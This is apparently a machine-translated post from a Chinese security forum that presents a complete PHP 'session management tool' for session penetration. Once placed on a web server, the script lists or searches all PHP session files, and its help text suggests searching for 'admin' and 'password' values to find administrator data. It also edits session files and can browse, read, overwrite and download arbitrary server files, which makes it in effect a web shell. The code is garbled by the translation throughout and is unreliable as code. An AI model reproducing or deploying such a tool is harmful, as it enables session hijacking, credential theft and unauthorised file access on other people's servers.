Author: Inking
Source: evil baboons Information Security Team (www.eviloctal.com)
My floor was disconnected two days ago, so I couldn't do anything. I just saw an article about session penetration written by a mad dog in my blog. The article was very simple. In the end, the mad dog "stingy" didn't send out the application, so no matter whether it is used or not, I wrote it down first. because you cannot check the information, you have to read this Manual. The Code may still have defects in many aspects. the most annoying problem is the regular expression and file stream operations. It loops through the loop to confuse all my headers, debugging takes a whole day (it's hard to write code ). I hope you will give more comments .. mad Dog chapter: http://www.loveshell.net/blog/blogview.asp? LogID = 101
After writing the program, I conducted a rough test on the execution efficiency of the program.
Execution Environment: winxp, PHP5, apache2, core 2050--1.6GHZ, 512m memory, 945 Motherboard
File System: 6-layer directory with 1000 files per layer. The session file is about 50-bytes.
Searching for these 6000 files takes about 10-15 seconds, and the efficiency is not as low as I think.
Copy codeThe Code is as follows: <?
If (isset ($ _ GET ['Download']) {
$ Filename = $ _ GET ['filename'];
$ Dirname = $ _ GET ['dirname'];
Ob_start ();
Download ($ dirname, $ filename );
Flush;
}
Session_start ();
$ Default = ini_get ('session. save_path ');
$ Thispath = str_replace ("\", "/" ,__ FILE __);
$ Thispath = substr ($ thispath, 0, strrpos ($ thispath ,"/"));
?>
<Html>
<Head>
<Title> SESSION management tool </title>
<Head>
<Style>
Body {
Margin: 0;
Padding: 0;
Background: #000000;
Color: green;
Margin-top = 60px;
FONT-FAMILY: verdana;
FONT-SIZE: 10px;
}
Input {
Margin: 0px;
Padding: 0px;
Color: green;
Border: 1px;
Border-bottom-color: # ffffff;
}
Hr {
Width: 85%;
Height: 1px;
}
</Style>
</Head>
<Body> <center> <Hr>
<P> </p>
<Table border = 1 bordercolorlight = "000000" bordercolordark = "000000">
<Form action = <? Echo $ _ SERVER ['php _ SELF '];?> Method = GET>
<Tr> <td> <B> SESSION path </B> <input type = text name = spath value = "<? Echo $ default;?> "> </Td> </tr>
<Tr> <td> <input type = "radio" checked name = "fetch" value = searchone onclick = "sessname. disabled = false; "> <B> Search for a specified SESSION </B>
<Input type = text name = sessname>
<Tr> <td> <input type = "radio" name = "fetch" value = all onclick = "sessname. disabled = true; "> <B> Read all sessions </B>
<Input type = submit value = read> <input type = reset value = reset> </td> </tr> </form> </table> <p> </p>
<Table border = 1 bordercolorlight = "000000" bordercolordark = "000000">
<?
Set_time_limit (0 );
If (PHP_VERSION <'4. 1.0 '){
$ _ POST = & $ HTTP_POST_VARS;
$ _ GET = & $ HTTP_GET_VARS;
}
$ Spath = $ _ GET ['spath'];
If (isset ($ _ GET ['fetch']) {// keyword search
If (isset ($ _ GET ['fetch'] ['searchon']) & isset ($ _ GET ['sessname']) & $ type = "1 ") {
! Empty ($ _ GET ['ssname']) or die ("<tr> <td> <font color = # B3614D> enter a search keyword </font> </td> </tr> ");
$ Sessname = $ _ GET ['ssname'];
Getfname ($ spath );
Count ($ session)> 0 or die ("<tr> <td> <font color = # B3614D> the content is blank, check the directory correctness or modify the keyword </font> </td> </tr> ");
Foreach ($ session as $ fpath => $ sessinfo ){
Foreach ($ sessinfo as $ sessid => $ contents ){
Echo "<tr> <p> <td> <a href =? Modfname = ". $ fpath. "& modname = ". $ sessid. "& modify = 1> SID :". $ sessid. "</a> </td> </p> </tr> ";
Foreach ($ contents as $ name => $ value)
Echo "<tr> <td> <p>". $ name. "=>". $ value. "</p> </td> </tr> ";
}
}
}
Elseif (isset ($ _ GET ['fetch'] ['all']) {// find all
$ Type = 0;
Getfname ($ spath );
Count ($ session)> 0 or die ("<tr> <td> <font color = # B3614D> the content is blank, check the directory correctness </font> </td> </tr> ");
Foreach ($ session as $ fpath => $ sessinfo ){
Foreach ($ sessinfo as $ sessid => $ contents ){
Echo "<tr> <p> <td> <a href =? Modfname = ". $ fpath. "& modname = ". $ sessid. "& modify = 1> SID :". $ sessid. "</a> </td> </p> </tr> ";
Foreach ($ contents as $ name => $ value)
Echo "<tr> <td> <p>". $ name. "=>". $ value. "</p> </td> </tr> ";
}
}
}
Echo "</center> </table> ";
}
If (isset ($ _ GET ['modify']) {// display the content of a file
$ Modify = $ _ GET ['modify'];
$ Fpath = $ _ GET ['modfname'];
$ Sid = $ _ GET ['modname'];
Getvalue ($ fpath, '1 ','');
Echo "<tr> <td> path of the modified session file: <p>". $ fpath. "</p> </td> </tr> ";
Echo "<form action =". $ _ SERVER ['php _ SELF ']. "method = post> ";
Echo "<input type = hidden value =". $ fpath. "name = m_path> ";
! Empty ($ modsession) or die ("<tr> <td> <font color = # B3614D> the content is blank, check the directory correctness </font> </td> </tr> ");
Foreach ($ modsession as $ modsessinfo ){
Foreach ($ modsessinfo as $ modsessid => $ contents ){
Echo "<tr> <p> <td> SESSION_ID <input type = text name = m_sid value = ". $ modsessid. "> </td> </p> </tr> ";
$ I = 0;
Foreach ($ contents as $ modname => $ modvalue ){
Echo "<tr> <td> <p> ". $ modname. "=> <input type = text name = m_value [". $ I ++. "] value = ". $ modvalue. "> </p> </td> </tr> ";
}
}
}
Echo "<tr> <td> <input type = submit value = confirm modification> or <a href =". $ _ SERVER ['php _ SELF ']. "? Modify_all = yes & modfname = ". urlencode ($ fpath ). "> open the file </a> and edit it completely <a href = \" javascript: history. go (-1); \ "> or return to modify other </a> </td> </tr> </form> </center> </table> ";
}
If (isset ($ _ POST ['m _ path']) {// modify a single value
$ M_path = $ _ POST ['m _ path'];
$ M_value = $ _ POST [m_value];
$ F = fopen ($ m_path, 'R ');
$ Content = fgets ($ f, 1024 );
$ Explode = explode (";", $ content );
Fclose ($ f );
$ F = fopen ($ m_path, 'w ');
$ M_content = '';
For ($ I = 0; $ I <count ($ m_value); $ I ++ ){
$ Modified = ereg_replace ("\". * \ "", '"'. $ m_value [$ I]. '"', $ explode [$ I]);
$ M_content. = $ modified .";";
}
Fwrite ($ f, $ m_content );
Fclose ($ f );
Echo "<tr> <td> modified successfully, <a href = ". $ _ SERVER ['HTTP _ referer']. "> return and modify the session file again </a> </td> </tr> </center> </table> ";
}
If (isset ($ _ GET ['modify _ all']) {// display the content of the file to be modified
$ Filepath = $ _ GET ['modfname'];
$ F = fopen ($ filepath, "r ");
$ Fcontent = fread ($ f, filesize ($ filepath ));
Echo "<tr> <td> the file you are modifying is". $ filepath;
Echo "<form action =". $ _ SERVER ['php _ SELF ']. "method = post> ";
Echo "<input type = hidden name = filepath value =". $ filepath. "> ";
Echo "<center> <textarea cols = 100 rows = 15 name = m_content>". $ fcontent. "</textarea> </center> ";
Echo "<p> <input type = submit value = confirm modification> <a href = \" javascript: history. go (-1 ); \ "> back to the previous step </a> </form> </p> </td> </tr> </center> </table> ";
Fclose ($ f );
}
If (isset ($ _ POST ['m _ content']) {// complete modification
$ M_content = $ _ POST ['m _ content'];
$ Filepath = $ _ POST ['filepath'];
If (get_magic_quotes_gpc () $ m_content = stripslashes ($ m_content );
$ F = fopen ($ filepath, "w ");
Fwrite ($ f, $ m_content );
Fclose ($ f );
Echo "<tr> <td> <a href =". $ _ SERVER ['php _ SELF ']. "? Modify_all = yes & modfname = ". urlencode ($ filepath)."> click here to view or modify it again </a> </td> </tr> ";
Echo "<tr> <td> <a href = ". $ _ SERVER ['php _ SELF ']. "> back to homepage </a> </td> </tr> </center> </table> ";
}
If (isset ($ _ GET ['help']) {// display help
Print <eof
<Tr> <td> the function of this program is to read the values of all session files in this folder and Its subfolders from the specified folder, or to search for session files containing the specified keyword, however, because the database function is not used, it does not support multiple keyword searches. Please search for keywords like "admin", "pwd", "user ", "password" and other keywords that may contain administrator information. <br> If the server has a large access volume, many session files are generated. It is best to use the Keyword Method and wait patiently because the program needs to read and match session files one by one, low efficiency can be imagined. <br> because this program is designed to find relevant content from a large number of session files, it does not add the function of directly modifying the specified session file, the only difference is to edit the session file. if necessary, use NotePad to open the session file and edit it. you can also submit the following url for editing: "http://test.com/session.php? Modfname = <session file path> & modname = <session_id> & modify = 1 ". <br> Replace "\" with "/" whenever possible in the session path field. The default storage path of the windows seesion file is "c:/windows/temp ", it is "/tmp" in linux, but the program will automatically help you read the path of the current session. If you need to read other sessions, please search for them and enter them manually. if you know the specific folder of the session file you need, it is best to specify the folder, which can save time. click "read" and the search result is displayed. The result is displayed in the form of "session_name => value". Click the corresponding session_id to enter the editing status, click "confirm to modify" to modify the relevant content, or click "Open File" to edit the content completely, and then click "save. <br> If the directory is incorrect or the session file in the directory is empty, the program reports an error "No sessi in the directory ". On file ", please check carefully at this time. <br> after the program is completed, the network has not been restored, so I added a simple file operation function for ease of use. <br> because I am not very familiar with regular expressions, the working principle of the session may not be very thorough. It took me two days to write it, and debugging took me more than half of the time, so it is inevitable that the bug will be solved, welcome to my blog for more information on regular expression matching. <br> for two articles inspired by this program, see: http://www.loveshell.net/blog/blogview.asp? LogID = 101 <br> Please delete this help document for specific use. This program belongs to Inking and is only for communication. The consequences caused by all use are irrelevant to the author. </td> </tr> </center> </table>
Eof;
}
If (isset ($ _ GET ['fcontrol']) {
$ Dirname = $ _ GET ['dirname'];
If ($ dirname [strlen ($ dirname)-1]! = "\" & $ Dirname [strlen ($ dirname)-1]! = "/") $ Dirname. = "/";
Echo "<tr> <td> current file path:". $ dirname. "</td> </tr> ";
$ Opendir = opendir ($ dirname) or die ("<tr> <td> <font color = # B3614D> failed to open the file </font> </td> </tr> ");
While ($ file = readdir ($ opendir )){
If ($ file = "."){
Echo "<tr> <td> <a href =". $ _ SERVER ['php _ SELF ']. "? Fcontrol = yes & dirname = ". urlencode ($ dirname)."> ". $ file." </a> </td> </tr> ";
Continue;
}
Elseif ($ file = ".."){
$ Newname = substr ($ dirname, 0, strrpos ($ dirname ,"/"));
$ Newname = substr ($ newname, 0, strrpos ($ newname, "/") + 1 );
Echo "<tr> <td> <a href =". $ _ SERVER ['php _ SELF ']. "? Fcontrol = yes & dirname = ". urlencode ($ newname)."> ". $ file." </a> </td> </tr> ";
}
Elseif (is_dir ($ dirname. $ file ."/")){
Echo "<tr> <td> <a href =". $ _ SERVER ['php _ SELF ']. "? Fcontrol = yes & dirname = ". urlencode ($ dirname. $ file)."/> ". $ file." </a> </td> </tr> ";
}
Elseif (getftype ($ file )){
Echo "<tr> <td> <a href =". $ _ SERVER ['php _ SELF ']. "? Modify_all = yes & modfname = ". urlencode ($ dirname. $ file)."> ". $ file." </a> </td> </tr> ";
}
Else {
Echo "<tr> <td> <a href =". $ _ SERVER ['php _ SELF ']. "? Download = yes & filename = ". urlencode ($ file ). "& dirname = ". urlencode ($ dirname ). "> ". $ file. "</a> </td> </tr> ";
}
}
}
Function getfname ($ spath) {// traverse the directory and call the getvalue () function to obtain the values of each session_name
Global $ fpath, $ file;
If ($ spath [strlen ($ spath)-1]! = "\" & $ Spath [strlen ($ spath)-1]! = "/") $ Spath. = "/";
$ Opendir = opendir ($ spath) or die ("<tr> <td> <font color = # B3614D> failed to open the file </font> </td> </tr> ");
While ($ file = readdir ($ opendir )){
If ($ file = "." | $ file = "..") continue;
If (is_dir ($ spath. $ file ."/")){
Getfname ($ spath. $ file ."/");
}
Elseif (ereg ("^ sess _", $ file )){
$ Fpath = $ spath. $ file;
Preg_match ('/(^ sess _) (. +) +/', $ file, $ prex );
$ File = $ prex [2];
Getvalue ($ fpath, '0', $ type );
}
}
Closedir ($ opendir );
}
Function getvalue ($ fpath, $ modify = '0', $ type) {// obtain the value of the session variable in a session file.
Global $ type, $ fpath, $ sessname, $ session, $ file, $ modsession, $ sid;
$ F = fopen ($ fpath, "a + ");
$ Content = fgets ($ f, 1024 );
Fclose ($ f );
$ Explode = explode (";", $ content );
$ I = 0;
While ($ match = $ explode [$ I ++]) {
Preg_match ('/(^ [^ \ |] *) + \ |. + \ "(. +) + \" $/', $ match, $ value );
$ Sname = $ value [1];
$ Svalue = $ value [2];
If ($ modify = 1 ){
$ Modsession [$ fpath] [$ sid] [$ sname] = $ svalue;
Continue;
}
If ($ type ){
If (eregi ($ sessname, $ sname) = true ){
$ Session [$ fpath] [$ file] [$ sname] = $ svalue;
}
}
Else {
$ Session [$ fpath] [$ file] [$ sname] = $ svalue;
}
}
}
Function getftype ($ filename) {// determine the file type
$ Ftype = substr ($ filename, strrpos ($ filename, ".") + 1 );
Switch ($ ftype ){
Case "txt ":
Return true;
Case "asp ":
Return true;
Case "php ":
Return true;
Case "ini ":
Return true;
Case "log ":
Return true;
Default:
Return false;
}
}
Function download ($ dirname, $ filename ){
$ F = fopen ($ dirname. $ filename, "r ");
$ Contents = fread ($ f, filesize ($ dirname. $ filename ));
Fclose ($ f );
Header ("Content-type: application/octet-stream ");
Header ("Accept-Ranges: bytes ");
Header ("Accept-Length:". filesize ($ dirname. $ filename ));
Header ("Content-Disposition: attachment; filename =". $ filename );
Echo $ contents;
}
?>
</Table>
<P> </p>
<Hr>
<Center> <p> Code By Inking <a href = 'HTTP: // hi.baidu.com/in_king'> The Entry To My Website </a> QQ: 165068585 </p>
</Center>
</Body>
</Html>
Download